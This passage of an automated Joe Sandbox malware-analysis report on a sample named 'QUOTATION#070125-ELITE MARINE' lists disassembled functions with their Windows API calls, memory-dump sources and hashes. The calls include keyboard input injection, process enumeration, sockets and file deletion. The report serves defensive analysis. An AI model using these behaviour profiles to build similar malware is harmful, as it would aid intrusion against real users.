                                                                            • SetErrorMode.KERNEL32(00000000,?,?,006CCC08), ref: 006A4AD0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$InformationVolume
                                                                            • String ID: %lu
                                                                            • API String ID: 2507767853-685833217
                                                                            • Opcode ID: 13a39fbb0aa330728195b3ab5997e8a278952ba9bf33b5dd33739805b52c3ed1
                                                                            • Instruction ID: 603262db0def07d10f2dfe89a669560cd2290c12cedae22333157e57d0a55639
                                                                            • Opcode Fuzzy Hash: 13a39fbb0aa330728195b3ab5997e8a278952ba9bf33b5dd33739805b52c3ed1
                                                                            • Instruction Fuzzy Hash: 90317F71A00108AFDB50DF54C885EAA77F9EF45314F1480A9E509DB252DB71ED45CBA1
                                                                            Function 006C41EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 006C424F
                                                                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 006C4264
                                                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 006C4271
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: msctls_trackbar32
                                                                            • API String ID: 3850602802-1010561917
                                                                            • Opcode ID: f5d0755866b1f57b73b774ac7ef42d7ac5b383ddb5f91d7380659ab195811920
                                                                            • Instruction ID: 5d949da3def4acd5ba1d363c1942500ba200726b3dc0cbc47b3cdf5266979699
                                                                            • Opcode Fuzzy Hash: f5d0755866b1f57b73b774ac7ef42d7ac5b383ddb5f91d7380659ab195811920
                                                                            • Instruction Fuzzy Hash: BA110631240208BEEF209F29CC06FFB3BAEEF85B64F014119FA55E2190D675DC519B14
                                                                            Function 00692F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00692DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00692DC5
                                                                              • Part of subcall function 00692DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00692DD6
                                                                              • Part of subcall function 00692DA7: GetCurrentThreadId.KERNEL32 ref: 00692DDD
                                                                              • Part of subcall function 00692DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00692DE4
                                                                            • GetFocus.USER32 ref: 00692F78
                                                                              • Part of subcall function 00692DEE: GetParent.USER32(00000000), ref: 00692DF9
                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00692FC3
                                                                            • EnumChildWindows.USER32(?,0069303B), ref: 00692FEB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows
                                                                            • String ID: %s%d
                                                                            • API String ID: 2776554818-1110647743
                                                                            • Opcode ID: 8f1923819c0918a3b96e1100e513603464185e2be1e2378d061857612c873bb1
                                                                            • Instruction ID: 8622f906cd9c42aaa394ba1fc9d43ecb265fc1b9223288a34214c7dbc637e956
                                                                            • Opcode Fuzzy Hash: 8f1923819c0918a3b96e1100e513603464185e2be1e2378d061857612c873bb1
                                                                            • Instruction Fuzzy Hash: 1D11B1716002156BCF947F70CC99EFE776FAF84314F048079FA0A9B292DE30994A8B64
                                                                            Function 006C5882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 006C58C1
                                                                            • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 006C58EE
                                                                            • DrawMenuBar.USER32(?), ref: 006C58FD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Menu$InfoItem$Draw
                                                                            • String ID: 0
                                                                            • API String ID: 3227129158-4108050209
                                                                            • Opcode ID: a3a88416ee4a217ac5a2e41b307bbc8d36a4671c07981083f6a0f0982cba39b6
                                                                            • Instruction ID: d205a4233f8f65955ea5690cb02f9a50aadeee108d5e65185cceb226b324a01a
                                                                            • Opcode Fuzzy Hash: a3a88416ee4a217ac5a2e41b307bbc8d36a4671c07981083f6a0f0982cba39b6
                                                                            • Instruction Fuzzy Hash: 49011B31500258EEDB619F11DC44FBEBBBAFB45361F10809EE84AD6251DB309A95DF21
                                                                            Function 0068D3A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 0068D3BF
                                                                            • FreeLibrary.KERNEL32 ref: 0068D3E5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: AddressFreeLibraryProc
                                                                            • String ID: GetSystemWow64DirectoryW$X64
                                                                            • API String ID: 3013587201-2590602151
                                                                            • Opcode ID: cd6fdff59768f6e5af072020a09f13ff10172198db68c28622a26ca69a96d316
                                                                            • Instruction ID: c1414187081db0482fd8674e60d8a861c4063e6559fed263141c8588ee733c5c
                                                                            • Opcode Fuzzy Hash: cd6fdff59768f6e5af072020a09f13ff10172198db68c28622a26ca69a96d316
                                                                            • Instruction Fuzzy Hash: A5F0E521845621EBD7313B114C64EB9B727AF11B11B598369E90AE22C4DB20CE4587B2
                                                                            Function 0069007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a9d63f4174466cf1edc9f70159ed4737bfa39cd5b05f8edd3edd0828e2cb9bd1
                                                                            • Instruction ID: cd9fde1baa2bce8e0967c1fb185da919a11ec3782f67e7c34c09397016b708a0
                                                                            • Opcode Fuzzy Hash: a9d63f4174466cf1edc9f70159ed4737bfa39cd5b05f8edd3edd0828e2cb9bd1
                                                                            • Instruction Fuzzy Hash: 9BC14C75A00216EFDF14CFA4C894AAEB7BAFF48714F208598E505EB251D731DE42DB90
                                                                            Function 006B342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Variant$ClearInitInitializeUninitialize
                                                                            • String ID:
                                                                            • API String ID: 1998397398-0
                                                                            • Opcode ID: b74b8cdec897b0519bf54026ef36045e10406618d9cbe9a12dc1f6160e72684e
                                                                            • Instruction ID: 4017dd282dd933ddbc6551bc052f3a22462257e1fbaec92154456811964c9b8e
                                                                            • Opcode Fuzzy Hash: b74b8cdec897b0519bf54026ef36045e10406618d9cbe9a12dc1f6160e72684e
                                                                            • Instruction Fuzzy Hash: F3A14AB57042109FCB54DF28C485A6AB7E6FF88724F04885DF98A9B362DB30ED41CB95
                                                                            Function 006C6278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetWindowRect.USER32(00DCDC08,?), ref: 006C62E2
                                                                            • ScreenToClient.USER32(?,?), ref: 006C6315
                                                                            • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 006C6382
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Window$ClientMoveRectScreen
                                                                            • String ID:
                                                                            • API String ID: 3880355969-0
                                                                            • Opcode ID: e6ab40a8ef4e06a58ce8d109e247548a6141cf7cf4c16211847d6e1f330dec69
                                                                            • Instruction ID: a8728020b25217b3cb6f2c216220960811be83a1016edc000aa4631b05c172ec
                                                                            • Opcode Fuzzy Hash: e6ab40a8ef4e06a58ce8d109e247548a6141cf7cf4c16211847d6e1f330dec69
                                                                            • Instruction Fuzzy Hash: 0151F874A00249EFDB10DF68D984EBE7BB6EF45360F10826DF8199B290D730AD81CB94
                                                                            Function 006B1AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 006B1AFD
                                                                            • WSAGetLastError.WSOCK32 ref: 006B1B0B
                                                                            • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 006B1B8A
                                                                            • WSAGetLastError.WSOCK32 ref: 006B1B94
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$socket
                                                                            • String ID:
                                                                            • API String ID: 1881357543-0
                                                                            • Opcode ID: b041671b784b913213b5ab2023a68cb11095b0e015a36b8bcba05c1c5a9391e3
                                                                            • Instruction ID: 775a040b4994352504888a671f24f66b43bd08a6c3b2b3efb1668e428b0e1110
                                                                            • Opcode Fuzzy Hash: b041671b784b913213b5ab2023a68cb11095b0e015a36b8bcba05c1c5a9391e3
                                                                            • Instruction Fuzzy Hash: B141B074600200AFE720AF24C896F6A77E6AB45718F54844CFA1A9F3D2D772DD828B90
                                                                            Function 006A56D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 006A5783
                                                                            • GetLastError.KERNEL32(?,00000000), ref: 006A57A9
                                                                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 006A57CE
                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 006A57FA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                                            • String ID:
                                                                            • API String ID: 3321077145-0
                                                                            • Opcode ID: 046457b5ca5e8a0f8dc9723423b4cb98706d1b4ee6c6bf3d4b8f799d94097d9a
                                                                            • Instruction ID: 887cc178c1e3df8d3ec59f44db304f439b321eebea5da2e25e00ff4a30b378e2
                                                                            • Opcode Fuzzy Hash: 046457b5ca5e8a0f8dc9723423b4cb98706d1b4ee6c6bf3d4b8f799d94097d9a
                                                                            • Instruction Fuzzy Hash: 62410C39600614DFCB25EF15C544A59BBE2EF89320F198488E85A6B362CB35FD41CF95
                                                                            Function 006C52C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 006C5352
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 006C5375
                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 006C5382
                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 006C53A8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: LongWindow$InvalidateMessageRectSend
                                                                            • String ID:
                                                                            • API String ID: 3340791633-0
                                                                            • Opcode ID: de3c6bfebebdf527b90f817059bbb4ae732e3ddbc09c13df0bcf370b48ad25ef
                                                                            • Instruction ID: e9bbc305844b728bbdfcfe5d09df42cf764812a6d433f30faea410652ac65ace
                                                                            • Opcode Fuzzy Hash: de3c6bfebebdf527b90f817059bbb4ae732e3ddbc09c13df0bcf370b48ad25ef
                                                                            • Instruction Fuzzy Hash: 3531B634A55A88EFEB309B54CC05FF97767EB04390F54410AFA1A963E1E7B4B9C09B81
                                                                            Function 0069AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetKeyboardState.USER32(?,772EA2E0,?,00008000), ref: 0069ABF1
                                                                            • SetKeyboardState.USER32(00000080,?,00008000), ref: 0069AC0D
                                                                            • PostMessageW.USER32(00000000,00000101,00000000), ref: 0069AC74
                                                                            • SendInput.USER32(00000001,?,0000001C,772EA2E0,?,00008000), ref: 0069ACC6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                            • String ID:
                                                                            • API String ID: 432972143-0
                                                                            • Opcode ID: d6685642146fb773396657950fbf8a2e39437bb09b5b4510671614374e94507e
                                                                            • Instruction ID: 782b3a8d137687efd78bdc0d83e5523ddb0a373f33320e4469a59c3479b4737c
                                                                            • Opcode Fuzzy Hash: d6685642146fb773396657950fbf8a2e39437bb09b5b4510671614374e94507e
                                                                            • Instruction Fuzzy Hash: A6310830A00618EFEF35CBA58C04BFA7BEFAB85321F04461EE4855AAD1C375898587D6
                                                                            Function 006C7674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ClientToScreen.USER32(?,?), ref: 006C769A
                                                                            • GetWindowRect.USER32(?,?), ref: 006C7710
                                                                            • PtInRect.USER32(?,?,006C8B89), ref: 006C7720
                                                                            • MessageBeep.USER32(00000000), ref: 006C778C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                                            • String ID:
                                                                            • API String ID: 1352109105-0
                                                                            • Opcode ID: 9c6388e907cf122fe8169d58731304e13531cebeb1a58de343d45fbd456e16ac
                                                                            • Instruction ID: 864a8279b9c7fa8794c00482ff02fcee70270a8228d2531e181f666b4c421933
                                                                            • Opcode Fuzzy Hash: 9c6388e907cf122fe8169d58731304e13531cebeb1a58de343d45fbd456e16ac
                                                                            • Instruction Fuzzy Hash: 01415534A09258DFCB01CF68D894FB9B7B6FB49314F5981ADE8149B361C734A942CFA0
                                                                            Function 006C16DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetForegroundWindow.USER32 ref: 006C16EB
                                                                              • Part of subcall function 00693A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00693A57
                                                                              • Part of subcall function 00693A3D: GetCurrentThreadId.KERNEL32 ref: 00693A5E
                                                                              • Part of subcall function 00693A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,006925B3), ref: 00693A65
                                                                            • GetCaretPos.USER32(?), ref: 006C16FF
                                                                            • ClientToScreen.USER32(00000000,?), ref: 006C174C
                                                                            • GetForegroundWindow.USER32 ref: 006C1752
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                            • String ID:
                                                                            • API String ID: 2759813231-0
                                                                            • Opcode ID: 7f8518791f8bc6591d183a19ab018fedbbe7891f1a9c320853382ca56f57922e
                                                                            • Instruction ID: 4fc3cc31ef0d1f47ca66a3e04b700f793994727b9533449865e8503489101b53
                                                                            • Opcode Fuzzy Hash: 7f8518791f8bc6591d183a19ab018fedbbe7891f1a9c320853382ca56f57922e
                                                                            • Instruction Fuzzy Hash: 53313D75D00149AFCB44EFA9C881DAEBBFAEF89314B5080ADE415E7212D7319E45CFA0
                                                                            Function 00694C7D Relevance: 6.1, APIs: 4, Instructions: 87windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • IsWindowVisible.USER32(?), ref: 00694C95
                                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00694CB2
                                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00694CEA
                                                                            • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00694D10
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow
                                                                            • String ID:
                                                                            • API String ID: 2796087071-0
                                                                            • Opcode ID: b7cf3c7aeac49eb183ec8bb073f5722cbd420856546f32b570d938b3df52a766
                                                                            • Instruction ID: b09b61f8307ab9e6de0cfc4a6b2bf4ba6d492ed3ee07d4250eac5c9a1ec43381
                                                                            • Opcode Fuzzy Hash: b7cf3c7aeac49eb183ec8bb073f5722cbd420856546f32b570d938b3df52a766
                                                                            • Instruction Fuzzy Hash: 7621F935604200BBEF155B35DD49E7B7B9EDF45760F10402DF809CA291EE61DC4296A0
                                                                            Function 0069D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 0069D501
                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 0069D50F
                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 0069D52F
                                                                            • CloseHandle.KERNEL32(00000000), ref: 0069D5DC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
